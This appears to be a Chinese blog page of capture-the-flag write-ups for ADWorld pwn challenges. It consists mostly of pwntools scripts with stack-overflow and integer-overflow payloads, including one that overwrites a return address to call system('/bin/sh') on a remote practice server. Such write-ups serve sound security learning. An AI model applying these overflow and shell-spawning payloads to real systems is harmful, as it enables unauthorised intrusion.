1 2 3 4 5 6 7 | from pwn import * p = remote("111.198.29.45",36585) p.sendlineafter("Birth?","0") payload=b'0'*(0x8)+p32(1926) print(len(payload)) p.sendlineafter("Name?",payload) p.interactive() |
ADWorld Pwn when_did_you_born
发表评论
1 2 3 4 5 6 7 | from pwn import * p = remote("111.198.29.45",36585) p.sendlineafter("Birth?","0") payload=b'0'*(0x8)+p32(1926) print(len(payload)) p.sendlineafter("Name?",payload) p.interactive() |
好像会点了^v^
1 2 3 4 5 6 7 8 9 | from pwn import * p = remote("111.198.29.45",55602) p.sendlineafter("your name","/bin/sh") strAddr=0x0804A080 sysAddr=0x08048420 payload=b'0'*(0x26+0x4)+p32(sysAddr)+p32(0)+p32(strAddr) print(len(payload)) p.sendlineafter("here:",payload) p.interactive() |
整数溢出的题目,之前从没做过,所以看了WriteUp。
1 2 3 4 5 6 7 8 9 | from pwn import * p = remote("111.198.29.45",56345) p.sendlineafter("Your choice:","1") p.sendlineafter("username:","123") flagAddr=0x0804868B payload=b'0'*(0x14+0x4)+p32(flagAddr)+b'0'*(0x105-0x8-0x14) print(len(payload)) p.sendlineafter("passwd:",payload) p.interactive() |
经Imagin大佬入门指点开始没事干闲的做点PWN玩,看了两个栈溢出的例子Writeup体验了一下,这个是第三个题目,自己做了一下,做出来了。
栈溢出覆盖随机数种子,写一个C程序用gcc编译一下能生成一模一样的随机数。
Pwn代码如下
1 2 3 4 5 | from pwn import * p = remote("111.198.29.45",44610) payload=bytearray('0'*0x24,"utf-8") p.sendline(payload) p.interactive() |